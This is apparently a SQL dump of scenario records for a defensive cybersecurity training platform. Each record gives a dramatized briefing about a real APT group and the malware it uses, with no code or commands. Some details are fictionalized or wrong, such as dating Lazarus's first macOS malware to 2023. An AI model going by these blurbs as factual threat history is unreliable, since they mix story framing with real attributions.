(130, 'Operation Mustang Panda', 'Mustang Panda (TA416)', 'Investigate Mustang Panda\'s espionage activities using PlugX malware and COVID-19 lures against Mongolian and Southeast Asian targets.', 'In this training scenario, participants will delve into the activities of Mustang Panda, a notorious Chinese APT group known for targeting Mongolian and Southeast Asian entities. The mission focuses on their use of the PlugX malware, distributed through COVID-19 themed phishing lures. Analysts are tasked with identifying and analyzing the threat actors\' tactics, techniques, and procedures (TTPs) to understand their espionage objectives and methodologies.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Mustang Panda\\\",\\\"PlugX malware\\\",\\\"COVID-19 lures\\\",\\\"Chinese APT\\\",\\\"cyber espionage\\\"]\"', '', 3, '2026-02-07 21:20:43', 'Mustang Panda APT Operation: Analyzing PlugX Malware and COVID-19 Lures', 'Investigate Mustang Panda\'s espionage activities using PlugX malware and COVID-19 lures against Mongolian and Southeast Asian targets.', 'operation-mustang-panda', 1),
(131, 'Operation LuckyMouse', 'LuckyMouse (APT27)', 'Investigate LuckyMouse\'s espionage on government and telecoms via watering hole attacks and HyperBro malware.', 'In a high-stakes digital landscape, the Chinese espionage group known as LuckyMouse (APT27) has launched a sophisticated campaign targeting government and telecommunications sectors. Leveraging watering hole attacks and deploying the notorious HyperBro malware, this threat actor aims to infiltrate sensitive networks and extract valuable intelligence. Participants must dissect this operation, tracing the attack from initial access through to data exfiltration, all while navigating complex threat landscapes.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"APT27\\\",\\\"LuckyMouse\\\",\\\"cyber espionage\\\",\\\"watering hole attack\\\",\\\"HyperBro malware\\\"]\"', '', 5, '2026-02-07 21:21:04', 'Advanced Cyber Ops Training: Unraveling APT27\'s Espionage Tactics', 'Investigate LuckyMouse\'s espionage on government and telecoms via watering hole attacks and HyperBro malware.', 'operation-luckymouse', 1),
(132, 'Operation BlackTech', 'BlackTech (Palmerworm)', 'Investigate BlackTech\'s espionage in East Asia, focusing on router firmware tampering and TSCookie malware in Japan and Taiwan.', 'In a shadowy operation targeting the technological hubs of Japan and Taiwan, the notorious APT group BlackTech, also known as Palmerworm, has launched a sophisticated espionage campaign. Their methods include tampering with router firmware and deploying the elusive TSCookie malware family. As a senior cyber threat intelligence analyst, your mission is to unravel this web of deceit and protect critical East Asian infrastructures from further compromise.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"BlackTech\\\",\\\"APT\\\",\\\"Espionage\\\",\\\"TSCookie\\\",\\\"Router Firmware\\\"]\"', '', 5, '2026-02-07 21:21:22', 'BlackTech Espionage Campaign: Router Firmware Tampering & TSCookie Analysis', 'Investigate BlackTech\'s espionage in East Asia, focusing on router firmware tampering and TSCookie malware in Japan and Taiwan.', 'operation-blacktech', 1),
(133, 'Operation Calypso', 'Calypso APT', 'Investigate Calypso APT\'s espionage campaign using PlugX and ProxyLogon against Central Asian governments.', 'In the heart of Central Asia, government institutions are under siege by the notorious Calypso APT. Known for their sophisticated cyber espionage campaigns, Calypso has launched a new operation focusing on intelligence gathering. Leveraging the ProxyLogon vulnerabilities for initial access, they deploy PlugX variants to maintain a foothold and extract sensitive data. As senior cyber threat intelligence analysts, your mission is to dissect and counteract this advanced threat, piecing together the clues left by the adversaries.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Calypso APT\\\",\\\"PlugX malware\\\",\\\"ProxyLogon vulnerability\\\",\\\"cyber espionage\\\",\\\"Central Asia\\\"]\"', '', 5, '2026-02-07 21:22:15', 'Calypso APT: Unraveling Espionage in Central Asia', 'Investigate Calypso APT\'s espionage campaign using PlugX and ProxyLogon against Central Asian governments.', 'operation-calypso', 1),
(139, 'Operation Clandestine Fox', 'APT3 (UPS)', 'Uncover APT3\'s exploitation of CVE-2014-1776 and Pirpi backdoor in a beginner-friendly cybersecurity operation.', 'In a high-stakes scenario, defense contractors are under threat from a sophisticated attack by APT3. Utilizing a zero-day vulnerability in Internet Explorer, they aim to deploy the Pirpi backdoor. As a cybersecurity analyst, you are tasked with piecing together clues from five critical alerts to unravel their tactics and secure your organization.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT3\\\",\\\"zero-day\\\",\\\"Internet Explorer\\\",\\\"CVE-2014-1776\\\",\\\"Pirpi backdoor\\\"]\"', '', 5, '2026-02-07 21:27:34', 'Investigate APT3\'s Internet Explorer Zero-Day Attack on Defense Contractors', 'Uncover APT3\'s exploitation of CVE-2014-1776 and Pirpi backdoor in a beginner-friendly cybersecurity operation.', 'operation-clandestine-fox', 1),
(134, 'Operation Emissary Panda', 'APT27 (Emissary Panda)', 'Conduct an expert-level investigation into APT27\'s targeting of aerospace and defense sectors using the HyperBro backdoor.', 'In an era where technology defines military superiority, APT27, known as Emissary Panda, has set its sights on the aerospace and defense industries. Leveraging the sophisticated HyperBro backdoor, this Chinese threat actor group systematically infiltrates and exfiltrates sensitive military technology. Your mission is to piece together the attack chain, drawing insights from a series of five alerts, each revealing a critical step in their operations.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"APT27\\\",\\\"cybersecurity training\\\",\\\"aerospace defense\\\",\\\"HyperBro backdoor\\\",\\\"military technology theft\\\"]\"', '', 5, '2026-02-07 21:22:39', 'Operation Sky Shield: Unveiling APT27\'s Aerospace Infiltration', 'Conduct an expert-level investigation into APT27\'s targeting of aerospace and defense sectors using the HyperBro backdoor.', 'operation-emissary-panda', 1),
(135, 'Operation Axiom', 'Axiom (Group 72)', 'Uncover Axiom\'s covert cyber-espionage tactics targeting NGOs and activists using the Hikit rootkit.', 'In the shadows of global diplomacy, the Axiom group, also known as Group 72, launches a clandestine operation targeting NGOs, dissidents, and pro-democracy organizations. Their mission: silence those who speak out for human rights. As a novice analyst, your task is to uncover their tracks, analyze the deployment of the Hikit rootkit, and understand their focus on neutralizing human rights activists. Navigate through a series of alerts that reveal Axiom\'s cunning strategies and stop them before they can cause irreparable harm.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"APT Group Axiom\\\",\\\"cyber-espionage\\\",\\\"Hikit rootkit\\\",\\\"human rights\\\",\\\"NGO cybersecurity\\\"]\"', '', 3, '2026-02-07 21:22:56', 'Operation Silent Dove: Axiom\'s Espionage on NGOs', 'Uncover Axiom\'s covert cyber-espionage tactics targeting NGOs and activists using the Hikit rootkit.', 'operation-axiom', 1),
(136, 'Operation Aurora 2.0', 'APT17 (Aurora Panda)', 'Investigate APT17\'s evolving tactics since the Aurora campaign, focusing on tech and defense targets.', 'In the aftermath of the infamous Aurora campaign, APT17, also known as Aurora Panda, continues to refine its tactics. This training scenario invites you to step into the role of an investigator tasked with unraveling APT17\'s latest maneuvers targeting the technology and defense sectors. As you track their operations, you\'ll explore their advanced tactics, techniques, and procedures (TTPs) and the persistent threats they pose.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT17\\\",\\\"cyber espionage\\\",\\\"Aurora\\\",\\\"technology sector\\\",\\\"defense sector\\\"]\"', '', 5, '2026-02-07 21:23:17', 'APT17 Post-Aurora Operations: Evolution in Cyber Espionage', 'Investigate APT17\'s evolving tactics since the Aurora campaign, focusing on tech and defense targets.', 'operation-aurora-2-0', 1),
(137, 'Operation Deputy Dog', 'APT17 (Deputy Dog)', 'Uncover APT17\'s Internet Explorer zero-day campaign against Japan, focusing on CVE-2013-3893 and watering hole tactics.', 'In the heart of Japan\'s bustling business district, whispers of a looming cyber threat have reached the ears of a dedicated team of cybersecurity operatives. An elusive adversary, APT17, known as Deputy Dog, is orchestrating a sophisticated campaign leveraging a zero-day vulnerability in Internet Explorer. Their target: prominent Japanese organizations. Participants are tasked with dissecting this complex operation, tracking the adversary from initial access to the final data exfiltration, and fortifying defenses against future incursions.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT17\\\",\\\"Zero-Day\\\",\\\"CVE-2013-3893\\\",\\\"Watering Hole Attack\\\",\\\"Cybersecurity Training\\\"]\"', '', 5, '2026-02-07 21:23:36', 'APT17\'s Zero-Day Assault: Defending Japanese Enterprises', 'Uncover APT17\'s Internet Explorer zero-day campaign against Japan, focusing on CVE-2013-3893 and watering hole tactics.', 'operation-deputy-dog', 1),
(138, 'Operation Ephemeral Hydra', 'APT17', 'Engage in a complex investigation of APT17\'s strategic web compromise on policy think tanks using multi-staged JavaScript injection.', 'In a world where information is power, policy think tanks become prime targets for nation-state actors. As a senior cyber threat intelligence analyst, you are tasked with unraveling APT17\'s sophisticated strategic web compromise. Your mission: analyze the multi-staged JavaScript injection and determine how this threat actor selectively targets visitors to gain unauthorized access to sensitive information.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"APT17\\\",\\\"JavaScript Injection\\\",\\\"Cybersecurity Training\\\",\\\"Strategic Web Compromise\\\",\\\"Advanced Threats\\\"]\"', '', 5, '2026-02-07 21:24:05', 'Advanced APT17 Strategic Web Compromise Investigation', 'Engage in a complex investigation of APT17\'s strategic web compromise on policy think tanks using multi-staged JavaScript injection.', 'operation-ephemeral-hydra', 1),
(140, 'Operation Clandestine Wolf', 'APT3', 'Investigate APT3\'s exploitation of CVE-2015-3113 and its evolution to newer techniques.', 'In mid-2015, cyber defenders faced a sophisticated campaign leveraging a zero-day exploit in Adobe Flash, CVE-2015-3113, orchestrated by APT3. Known for their stealth and advanced tactics, APT3\'s campaign evolved over time, incorporating newer exploitation techniques. Trainees will dissect this operation, understanding the adversary\'s strategies and fortifying defenses against similar threats.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"APT3\\\",\\\"Adobe Flash\\\",\\\"CVE-2015-3113\\\",\\\"Zero-Day\\\",\\\"Cybersecurity Training\\\"]\"', '', 5, '2026-02-07 21:27:58', 'APT3: Analyzing the Adobe Flash Zero-Day Campaign', 'Investigate APT3\'s exploitation of CVE-2015-3113 and its evolution to newer techniques.', 'operation-clandestine-wolf', 1),
(141, 'Operation Double Tap', 'APT3', 'Uncover APT3\'s dual zero-day campaign exploiting Flash and Windows, focusing on vulnerability chaining and Pirpi malware.', 'In this intermediate training operation, participants will delve into a sophisticated attack orchestrated by APT3. The group has launched a dual zero-day campaign, exploiting vulnerabilities in both Flash and Windows systems. Trainees must analyze the intricacies of vulnerability chaining and follow the trail of Pirpi malware deployments. This scenario challenges participants to trace the attack from initial access to data exfiltration, employing analytical skills and APT3\'s known techniques.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"APT3\\\",\\\"zero-day\\\",\\\"Flash exploit\\\",\\\"Windows vulnerability\\\",\\\"Pirpi malware\\\"]\"', '', 5, '2026-02-07 21:28:20', 'APT3 Zero-Day Chain Investigation Training', 'Uncover APT3\'s dual zero-day campaign exploiting Flash and Windows, focusing on vulnerability chaining and Pirpi malware.', 'operation-double-tap', 1),
(142, 'Operation Lotus Blossom', 'Lotus Blossom (Elise)', 'Uncover Lotus Blossom\'s Southeast Asian espionage campaign against military targets using the Elise backdoor.', 'In the shadows of Southeast Asia, an advanced persistent threat looms over military and government networks. Known as Lotus Blossom, this APT group has launched a sophisticated espionage campaign, leveraging their custom Elise backdoor to infiltrate and extract sensitive information from the Philippine military. As a senior cyber threat analyst, it is your mission to dissect their tactics, techniques, and procedures, and to thwart their malicious endeavors.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Lotus Blossom\\\",\\\"Elise backdoor\\\",\\\"cyber espionage\\\",\\\"military targeting\\\",\\\"APT investigation\\\"]\"', '', 5, '2026-02-07 21:46:54', 'Advanced Investigation of Lotus Blossom\'s Espionage Tactics', 'Uncover Lotus Blossom\'s Southeast Asian espionage campaign against military targets using the Elise backdoor.', 'operation-lotus-blossom', 1),
(143, 'Operation Hellsing', 'Hellsing', 'Investigate the rare APT-on-APT attack as Hellsing targets Naikon in an espionage group conflict.', 'In an unprecedented clash, the Hellsing group has launched an attack on rival APT group Naikon. This expert-level scenario immerses you in the high-stakes world of cyber espionage, where one group of state-sponsored hackers targets another. Your mission is to unravel the mystery behind this unusual conflict and understand the motivations and tactics of both sides. Analyze the attack chain and determine the implications of this inter-APT rivalry.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"APT-on-APT attack\\\",\\\"cyber espionage\\\",\\\"Hellsing\\\",\\\"Naikon\\\",\\\"cyber threat analysis\\\"]\"', '', 5, '2026-02-07 21:47:13', 'Hellsing vs Naikon: APT-on-APT Conflict Investigation', 'Investigate the rare APT-on-APT attack as Hellsing targets Naikon in an espionage group conflict.', 'operation-hellsing', 1),
(144, 'Operation Tropic Trooper', 'Tropic Trooper (KeyBoy)', 'Train to investigate Tropic Trooper\'s espionage targeting Taiwan and Philippines, focusing on military and government sectors.', 'In this training scenario, participants will dive into the covert world of Tropic Trooper, also known as KeyBoy. This APT group is known for its strategic espionage campaigns targeting Taiwan and the Philippines, particularly focusing on military and government institutions. Using the Yahoyah malware family, Tropic Trooper aims to infiltrate, execute operations, and exfiltrate sensitive data. Your mission is to unravel their tactics and uncover their objectives through a series of alerts.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Tropic Trooper\\\",\\\"KeyBoy\\\",\\\"Yahoyah malware\\\",\\\"cyber espionage\\\",\\\"cybersecurity training\\\"]\"', '', 3, '2026-02-07 21:47:32', 'Tropic Trooper Espionage Campaign Investigation', 'Train to investigate Tropic Trooper\'s espionage targeting Taiwan and Philippines, focusing on military and government sectors.', 'operation-tropic-trooper', 1),
(145, 'Operation Earth Lusca', 'Earth Lusca', 'Investigate Earth Lusca\'s use of ShadowPad and Cobalt Strike targeting governmental entities. Beginner-friendly.', 'In a rapidly evolving cyber landscape, the Chinese threat actor Earth Lusca has set its sights on government and intergovernmental organizations. Your mission is to analyze how they deploy ShadowPad backdoors and establish Cobalt Strike infrastructure. As a cybersecurity analyst, you will unravel their tactics, techniques, and procedures, piecing together the puzzle of a sophisticated cyber operation.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Earth Lusca\\\",\\\"ShadowPad\\\",\\\"Cobalt Strike\\\",\\\"cybersecurity training\\\",\\\"APT\\\"]\"', '', 5, '2026-02-07 21:47:55', 'Earth Lusca Cybersecurity Training: ShadowPad and Cobalt Strike Analysis', 'Investigate Earth Lusca\'s use of ShadowPad and Cobalt Strike targeting governmental entities. Beginner-friendly.', 'operation-earth-lusca', 1),
(146, 'Operation Sharp Panda', 'Sharp Panda', 'Explore Sharp Panda\'s espionage targeting Southeast Asian governments using the Soul framework and RoyalRoad RTF.', 'In this training scenario, participants will step into the shoes of a cyber threat intelligence analyst tasked with uncovering Sharp Panda\'s espionage campaign against Southeast Asian government entities. Utilizing advanced tools such as the Soul framework and the RoyalRoad RTF weaponizer, the attackers aim to infiltrate and exfiltrate sensitive governmental data. Trainees will navigate through multiple alerts to piece together the attacker\'s tactics, techniques, and procedures.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Sharp Panda\\\",\\\"APT Espionage\\\",\\\"Cybersecurity Training\\\",\\\"Soul Framework\\\",\\\"RoyalRoad RTF\\\"]\"', '', 5, '2026-02-24 03:12:43', 'Sharp Panda Espionage Investigation Training', 'Explore Sharp Panda\'s espionage targeting Southeast Asian governments using the Soul framework and RoyalRoad RTF.', 'operation-sharp-panda', 1);
INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(147, 'Operation Scarlet Mimic', 'Scarlet Mimic', 'Investigate Scarlet Mimic\'s espionage campaign using FakeM malware against Uyghur and Tibetan activists.', 'In the shadows of the digital battlefield, Scarlet Mimic has launched a new espionage campaign targeting minority rights activists. Their tool of choice: FakeM malware, a sophisticated weapon aimed at the Uyghur and Tibetan communities. As a beginner analyst, your mission is to unravel this web of deceit, understand the unique targeting tactics, and protect the vulnerable.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Scarlet Mimic\\\",\\\"FakeM malware\\\",\\\"cyber espionage\\\",\\\"minority rights\\\",\\\"Uyghur Tibetan targeting\\\"]\"', '', 5, '2026-02-24 03:13:19', 'Operation Scarlet Sentinel: Unmasking Espionage Against Minority Rights Activists', 'Investigate Scarlet Mimic\'s espionage campaign using FakeM malware against Uyghur and Tibetan activists.', 'operation-scarlet-mimic', 1),
(148, 'Operation Groundbait', 'Groundbait (Prikormka)', 'Investigate Groundbait\'s 2014 Ukraine-focused espionage targeting activists and separatists.', 'In the tense prelude to the 2014 Ukraine conflict, the shadowy APT group known as Groundbait launched a covert espionage operation. Their targets were anti-government activists and separatists, aiming to gather intelligence and sow discord. As the cyber threat intelligence team, your mission is to dissect this campaign, tracing the steps of Groundbait through a series of alerts that reveal their tactics, techniques, and procedures.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Groundbait\\\",\\\"Ukraine Espionage\\\",\\\"Cybersecurity Training\\\",\\\"APT Group\\\",\\\"2014 Conflict\\\"]\"', '', 5, '2026-02-24 03:13:43', 'Groundbait Espionage Campaign: Ukraine 2014', 'Investigate Groundbait\'s 2014 Ukraine-focused espionage targeting activists and separatists.', 'operation-groundbait', 1),
(149, 'Operation BugDrop', 'Unknown (Ukraine-focused)', 'Investigate an APT\'s advanced surveillance targeting Ukrainian infrastructure via PC microphones and Dropbox exfiltration.', 'In the wake of escalating tensions, an unknown APT group has launched a sophisticated surveillance campaign against Ukrainian infrastructure organizations. Exploiting PC microphones for eavesdropping and using Dropbox for data exfiltration, this operation requires advanced investigative skills to uncover and mitigate the threat. Dive into the covert world of Operation Whisper and unravel the methods used by these elusive cyber adversaries.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"cybersecurity training\\\",\\\"APT surveillance\\\",\\\"Ukraine cyber threats\\\",\\\"Dropbox exfiltration\\\",\\\"advanced threat protection\\\"]\"', '', 5, '2026-02-24 03:14:08', 'Operation Whisper: Unmasking the Surveillance Threat', 'Investigate an APT\'s advanced surveillance targeting Ukrainian infrastructure via PC microphones and Dropbox exfiltration.', 'operation-bugdrop', 1),
(150, 'Operation Armageddon', 'Gamaredon', 'Investigate Gamaredon\'s high-volume targeting campaign in Ukraine, focusing on template injection and links to Russian security services.', 'In this expert-level training scenario, participants will delve into the intricacies of Gamaredon\'s recent surge in cyber operations targeting Ukraine. With a focus on understanding the sophisticated template injection techniques employed and scrutinizing potential connections to Russian security services, trainees will navigate through a series of alerts that reveal the attackers\' strategic objectives and methodologies.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Gamaredon\\\",\\\"Ukrainian cyber defense\\\",\\\"template injection\\\",\\\"Russian APT\\\",\\\"cybersecurity training\\\"]\"', '', 7, '2026-02-24 03:14:43', 'Expert Analysis of Gamaredon\'s Ukrainian Campaign', 'Investigate Gamaredon\'s high-volume targeting campaign in Ukraine, focusing on template injection and links to Russian security services.', 'operation-armageddon', 1),
(151, 'Operation IndigoZebra', 'IndigoZebra', 'Investigate IndigoZebra\'s Central Asian espionage, focusing on Dropbox API abuse and xCaon malware.', 'In the heart of Central Asia, government entities are under siege. The notorious APT group, IndigoZebra, has launched a sophisticated espionage campaign. Utilizing the Dropbox API for covert command and control, and deploying the elusive xCaon malware family, they aim to infiltrate, persist, and exfiltrate sensitive information. Your mission is to dismantle their operations and protect national security.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"IndigoZebra\\\",\\\"Central Asian espionage\\\",\\\"Dropbox API abuse\\\",\\\"xCaon malware\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-03-01 22:54:53', 'IndigoZebra: Unveiling the Central Asian Espionage Campaign', 'Investigate IndigoZebra\'s Central Asian espionage, focusing on Dropbox API abuse and xCaon malware.', 'operation-indigozebra', 1),
(152, 'Operation Moses Staff', 'Moses Staff (Iranian)', 'Explore the tactics of Moses Staff targeting Israeli organizations with DCSrv wiper and political data leaks.', 'In this hands-on training scenario, participants will step into the shoes of a cyber threat intelligence analyst tasked with investigating the notorious Iranian APT group, Moses Staff. Known for their politically-motivated cyber operations against Israeli organizations, this group employs sophisticated tactics to not only disrupt but also to make a political statement through data leaks. Trainees will delve into the analysis of the DCSrv wiper malware, uncovering the methods used by this APT to infiltrate and compromise targets. By following the trail of alerts, participants will learn to piece together a comprehensive picture of the attack, understanding the motivations and techniques of the adversary.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Moses Staff\\\",\\\"Iranian APT\\\",\\\"DCSrv Wiper\\\",\\\"Cybersecurity Training\\\",\\\"Data Leaks\\\"]\"', '', 3, '2026-03-01 22:55:17', 'Investigate Moses Staff: Unveiling Iranian Hacktivist Attacks on Israel', 'Explore the tactics of Moses Staff targeting Israeli organizations with DCSrv wiper and political data leaks.', 'operation-moses-staff', 1),
(153, 'Agrius (Iranian)', 'Agrius (Iranian)', 'Explore Agrius APT\'s tactics with Apostle wiper mimicking ransomware in attacks on Israeli targets.', 'In the world of cyber warfare, the Iranian APT group Agrius is notorious for its unique blend of espionage and destructive attacks. This operation takes you through a simulated investigation into their signature move: deploying the Apostle wiper disguised as ransomware, with a particular focus on Israeli targets. Your mission is to unravel the sequence of events and prevent a catastrophe.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Agrius APT\\\",\\\"Apostle wiper\\\",\\\"cyber espionage\\\",\\\"ransomware\\\",\\\"Israeli cybersecurity\\\"]\"', '', 5, '2026-03-01 22:55:41', 'Investigating Agrius APT: Espionage and Destruction with Apostle Wiper', 'Explore Agrius APT\'s tactics with Apostle wiper mimicking ransomware in attacks on Israeli targets.', 'agrius-iranian', 1),
(154, 'Operation MuddyC3', 'MuddyWater', 'Analyze MuddyWater\'s PowerShell backdoors targeting Middle Eastern telecoms in this advanced cybersecurity operation.', 'As a senior cyber threat intelligence analyst, you are tasked with delving into the complex and evolving tactics of MuddyWater, an APT group known for its sophisticated cyber operations. Recently, MuddyWater has been observed refining its custom Command and Control (C2) framework, leveraging PowerShell-based backdoors to infiltrate and exploit telecommunications companies in the Middle East. Your mission is to investigate these developments, understand their methodologies, and identify strategic vulnerabilities.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"MuddyWater\\\",\\\"PowerShell backdoors\\\",\\\"C2 framework\\\",\\\"Middle Eastern telecommunications\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-03-01 22:56:11', 'Advanced Investigation into MuddyWater\'s Evolving C2 Framework', 'Analyze MuddyWater\'s PowerShell backdoors targeting Middle Eastern telecoms in this advanced cybersecurity operation.', 'operation-muddyc3', 1),
(155, 'Operation Lyceum', 'Lyceum (Hexane)', 'Investigate Lyceum\'s sophisticated operations against oil, gas, and telecom sectors using DanBot malware for credential harvesting.', 'In the heat of geopolitical tensions, the infamous Iranian APT group, Lyceum, has initiated a campaign targeting the vital oil, gas, and telecommunications sectors in the Middle East. As cyber defenders, you\'re tasked with uncovering their covert operations, analyzing the DanBot malware, and thwarting their relentless attempts to compromise sensitive credentials. This expert-level scenario demands a keen eye and strategic thinking to connect the dots and mitigate the threat posed by this adept adversary.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Lyceum APT\\\",\\\"DanBot Malware\\\",\\\"Cyber Threat Intelligence\\\",\\\"Credential Harvesting\\\",\\\"Middle East Cybersecurity\\\"]\"', '', 6, '2026-03-01 22:56:37', 'Expert Analysis of Lyceum\'s Targeted Attacks in the Middle East', 'Investigate Lyceum\'s sophisticated operations against oil, gas, and telecom sectors using DanBot malware for credential harvesting.', 'operation-lyceum', 1),
(156, 'Operation Kimsuky Campaign', 'Kimsuky (Thallium)', 'Investigate Kimsuky espionage tactics using AppleSeed and phishing against South Korean entities in this novice-level scenario.', 'The infamous North Korean APT group Kimsuky is back on the radar. Known for its focus on intelligence gathering, the group is now targeting South Korea\'s government and Unification Ministry. Your mission is to delve into their operations, unravel the use of the AppleSeed backdoor, and dismantle their credential phishing infrastructure. As a novice analyst, you\'ll piece together clues from a series of alerts to protect critical national interests.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Kimsuky\\\",\\\"cyber espionage\\\",\\\"AppleSeed\\\",\\\"phishing\\\",\\\"APT\\\"]\"', '', 5, '2026-03-01 23:00:24', 'Kimsuky Espionage Simulation: Unmasking North Korean Threats', 'Investigate Kimsuky espionage tactics using AppleSeed and phishing against South Korean entities in this novice-level scenario.', 'operation-kimsuky-campaign', 1),
(157, 'Operation Andariel Heist', 'Andariel (Silent Chollima)', 'Investigate Andariel\'s ATM hacks and IP theft in South Korea\'s defense sector.', 'In the ever-evolving landscape of cyber warfare, the Andariel Group, a notorious North Korean APT, has set its sights on South Korea\'s financial and defense sectors. Trainees must unravel the group\'s tactics, from ATM heists to the theft of sensitive defense contractor data. This mission is critical to ensuring the security of national resources and infrastructures.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Andariel APT\\\",\\\"Cybersecurity Training\\\",\\\"South Korea Defense\\\",\\\"ATM Hacks\\\",\\\"Intellectual Property Theft\\\"]\"', '', 5, '2026-03-01 23:00:47', 'Andariel\'s Assault: Defense and Finance Under Siege', 'Investigate Andariel\'s ATM hacks and IP theft in South Korea\'s defense sector.', 'operation-andariel-heist', 1),
(158, 'Operation BlueNoroff', 'BlueNoroff (Lazarus Subgroup)', 'Investigate BlueNoroff\'s SnatchCrypto campaign using AppleJeus malware against cryptocurrency startups.', 'In the shadowy world of cryptocurrency, a formidable adversary lurks. BlueNoroff, a subgroup of the infamous Lazarus Group, has launched the SnatchCrypto campaign, targeting emerging cryptocurrency startups. Their weapon of choice? The insidious AppleJeus malware. As a senior cyber threat intelligence analyst, you must delve into the depths of this operation, piecing together clues to thwart this sophisticated attack. From initial access to exfiltration, every step holds the key to unraveling BlueNoroff\'s grand scheme.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"BlueNoroff\\\",\\\"SnatchCrypto\\\",\\\"AppleJeus\\\",\\\"cryptocurrency\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-03-01 23:01:11', 'BlueNoroff\'s SnatchCrypto: Analyzing AppleJeus in Crypto Startups', 'Investigate BlueNoroff\'s SnatchCrypto campaign using AppleJeus malware against cryptocurrency startups.', 'operation-bluenoroff', 1),
(159, 'Operation TraderTraitor', 'Lazarus Group', 'Investigate Lazarus Group\'s targeting of cryptocurrency traders using trojanized apps and social engineering of developers.', 'In recent months, a surge in attacks targeting cryptocurrency traders and investors has been attributed to the infamous Lazarus Group. Known for their financial theft and espionage capabilities, this North Korean APT is now employing trojanized trading applications and sophisticated social engineering tactics to infiltrate blockchain development communities. Participants will navigate through a series of alerts, unraveling a complex plot aimed at exfiltrating valuable cryptocurrency assets.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"cryptocurrency attack\\\",\\\"trojanized applications\\\",\\\"social engineering\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-03-01 23:01:32', 'Lazarus Group Cryptocurrency Heist Simulation', 'Investigate Lazarus Group\'s targeting of cryptocurrency traders using trojanized apps and social engineering of developers.', 'operation-tradertraitor', 1),
(160, 'Operation Dream Job', 'Lazarus Group', 'Investigate Lazarus Group\'s LinkedIn-based social engineering targeting aerospace engineers with fake job offers.', 'In a new wave of cyber espionage, the notorious Lazarus Group has launched a sophisticated campaign targeting aerospace and defense engineers via LinkedIn. Using fake job offers as lures, the group seeks to infiltrate secure networks, gather intelligence, and potentially disrupt operations. This operation requires expert-level analysis to unearth the connections, trace the origins, and dismantle the threat.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"LinkedIn Phishing\\\",\\\"Aerospace Cybersecurity\\\",\\\"APT Threats\\\",\\\"Cyber Espionage\\\"]\"', '', 6, '2026-03-01 23:02:16', 'Lazarus Group\'s Aerospace and Defense Job Lure Campaign', 'Investigate Lazarus Group\'s LinkedIn-based social engineering targeting aerospace engineers with fake job offers.', 'operation-dream-job', 1),
(161, 'Operation In(ter)ception', 'Lazarus Group', 'Join the investigation into Lazarus Group\'s aerospace campaign, analyzing Mac malware and social engineering tactics.', 'The Lazarus Group, notorious for its sophisticated cyber operations, has shifted its sights to the aerospace and military contractor sector. With a history of high-profile attacks, this North Korean APT group blends espionage with financial motives. Trainees will delve into a campaign involving custom Mac malware and intricate social engineering, unraveling the layers of a cyber operation designed to breach sensitive industry networks.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"cybersecurity training\\\",\\\"aerospace defense\\\",\\\"Mac malware\\\",\\\"social engineering\\\"]\"', '', 3, '2026-03-03 22:00:09', 'Lazarus Group: Unmasking the Aerospace Campaign', 'Join the investigation into Lazarus Group\'s aerospace campaign, analyzing Mac malware and social engineering tactics.', 'operation-in-ter-ception', 1),
(162, 'Operation AppleJeus', 'Lazarus Group', 'Beginner scenario exploring Lazarus Group\'s first macOS malware and crypto exchange targeting.', 'In early 2023, a surge of compromised cryptocurrency trading applications hit the market. These apps, seemingly legitimate, were secretly crafted by the Lazarus Group, notorious for blending espionage with financial theft. Analysts must now delve into the first known macOS malware by Lazarus, following the group\'s footprints as they target cryptocurrency exchanges.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"macOS malware\\\",\\\"cryptocurrency\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-03-03 22:02:11', 'Investigating Lazarus Group\'s Trojanized Crypto Apps', 'Beginner scenario exploring Lazarus Group\'s first macOS malware and crypto exchange targeting.', 'operation-applejeus', 1),
